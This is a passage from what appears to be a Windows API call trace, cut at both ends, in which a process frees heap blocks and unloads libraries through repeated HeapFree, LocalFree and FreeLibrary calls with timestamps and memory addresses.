0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29ddc0 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2da350 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c71c0 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c71a0 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29ddb0 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7140 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d89b0 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d88f0 | out: hHeap=0x250000) returned 1 [0194.010] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8930 | out: hHeap=0x250000) returned 1 [0194.010] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8910 | out: hHeap=0x250000) returned 1 [0194.010] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29dd80 | out: hHeap=0x250000) returned 1 [0194.010] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8950 | out: hHeap=0x250000) returned 1 [0194.010] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7120 | out: hHeap=0x250000) returned 1 [0194.010] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7180 | out: hHeap=0x250000) returned 1 [0194.010] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7160 | out: hHeap=0x250000) returned 1 [0194.010] GetProcessHeap () returned 0x250000 [0194.010] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7100 | out: hHeap=0x250000) returned 1 [0195.490] GetProcessHeap () returned 0x250000 [0195.490] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2af410 | out: hHeap=0x250000) returned 1 [0195.491] FreeLibrary (hLibModule=0xd00000) returned 1 [0195.491] FreeLibrary (hLibModule=0x7fef2e80000) returned 1 [0195.492] free (_Block=0x417e00) [0195.493] LocalFree (hMem=0x274550) returned 0x0 [0195.493] LocalFree (hMem=0x2748a0) returned 0x0 [0195.493] LocalFree (hMem=0x2749b0) returned 0x0 [0195.493] LocalFree (hMem=0x273050) returned 0x0 [0195.493] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x2d7740 [0195.494] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x273050 [0195.494] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2d68f0 [0195.494] free (_Block=0x415a70) [0195.494] free (_Block=0x0) [0195.494] free (_Block=0x42dfa0) [0195.494] free (_Block=0x415a90) [0195.494] free (_Block=0x417de0) [0195.494] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2dd770 [0195.495] LocalFree (hMem=0x2dd770) returned 0x0 [0195.495] LocalFree (hMem=0x2749d0) returned 0x0 [0195.495] LocalFree (hMem=0x2d7740) returned 0x0 [0195.495] free (_Block=0x417bd0) [0195.495] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7fefdee0000 [0195.495] FreeLibrary (hLibModule=0x7fefdee0000) returned 1 [0195.496] LocalFree (hMem=0x2d68f0) returned 0x0 [0195.496] LocalFree (hMem=0x273050) returned 0x0 [0195.496] GlobalHandle (pMem=0x274330) returned 0x840008 [0195.496] GlobalUnlock (hMem=0x840008) returned 0 [0195.506] FreeLibrary (hLibModule=0x7fef2f60000) returned 1 [0195.507] FreeLibrary (hLibModule=0x7fef3400000) returned 1 [0195.510] FreeLibrary (hLibModule=0x7fef33f0000) returned 1 [0195.512] FreeLibrary (hLibModule=0x7fef33a0000) returned 1 [0195.512] FreeLibrary (hLibModule=0x7fef3260000) returned 1 [0195.514] FreeLibrary (hLibModule=0x7fef2cb0000) returned 1 [0195.515] FreeLibrary (hLibModule=0x7fef3230000) returned 1 [0195.516] FreeLibrary (hLibModule=0x7fef2f20000) returned 1 [0195.519] FreeLibrary (hLibModule=0x7fef3220000) returned 1 [0195.521] FreeLibrary (hLibModule=0x7fef3210000) returned 1 [0195.526] FreeLibrary (hLibModule=0x7fef2f10000) returned 1 [0195.876] FreeLibrary (hLibModule=0x7fef2c90000) returned 1 [0195.878] FreeLibrary (hLibModule=0x7fef29a0000) returned 1 [0195.883] FreeLibrary (hLibModule=0x7fef28a0000) returned 1 [0195.892] FreeLibrary (hLibModule=0x7fef26d0000) returned 1 [0195.898] FreeLibrary (hLibModule=0x7fef2680000) returned 1 [0195.899] FreeLibrary (hLibModule=0x7fef2650000) returned 1 [0196.259] FreeLibrary (hLibModule=0x7fef2550000) returned 1 [0196.260] FreeLibrary (hLibModule=0x7fef2520000) returned 1 [0196.270] FreeLibrary (hLibModule=0x7fef50b0000) returned 1 [0196.273] GetProcessHeap () returned 0x250000 [0196.273] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2a51b0 | out: hHeap=0x250000) returned 1 [0196.273] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2707a0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2707c0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2707e0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270800 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270820 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270840 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270890 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2708b0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2708d0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2708f0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270910 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270930 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270950 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270970 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270990 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2709b0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2709d0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2709f0 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270a10 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270a30 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.274] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270a50 | out: hHeap=0x250000) returned 1 [0196.274] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270a70 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270a90 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270ab0 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270ad0 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270af0 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270b10 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270b30 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270b50 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270b70 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270b90 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270bb0 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270bd0 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270bf0 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270c10 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270c30 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270c50 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270c70 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270c90 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270cb0 | out: hHeap=0x250000) returned 1 [0196.275] GetProcessHeap () returned 0x250000 [0196.275] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270cd0 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270cf0 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270d10 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270d30 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270d50 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270d70 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270d90 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270db0 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270dd0 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270df0 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.276] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270e10 | out: hHeap=0x250000) returned 1 [0196.276] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270e30 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270e50 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270e70 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270e90 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270eb0 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270ed0 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270ef0 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270f10 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270f30 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270f50 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270f70 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270f90 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270fb0 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270fd0 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270ff0 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271010 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271030 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271090 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2710b0 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.277] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2710d0 | out: hHeap=0x250000) returned 1 [0196.277] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2710f0 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271110 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271130 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271150 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271170 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271190 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2711b0 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2711d0 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2711f0 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271210 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271230 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271250 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271270 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271290 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2712b0 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2712d0 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2712f0 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271310 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271330 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271350 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.278] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271370 | out: hHeap=0x250000) returned 1 [0196.278] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271390 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2713b0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2713d0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2713f0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271410 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271430 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271450 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271470 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271490 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2714b0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2714d0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2714f0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271510 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271530 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271550 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271570 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271590 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2715b0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2715d0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2715f0 | out: hHeap=0x250000) returned 1 [0196.279] GetProcessHeap () returned 0x250000 [0196.279] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271610 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271630 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271650 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271670 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271690 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2716b0 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2716d0 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2716f0 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271710 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271730 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271750 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271770 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271790 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2717b0 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2717d0 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2717f0 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271810 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271830 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271890 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2718b0 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.280] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2718d0 | out: hHeap=0x250000) returned 1 [0196.280] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2718f0 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271910 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271930 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271950 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271970 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271990 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: 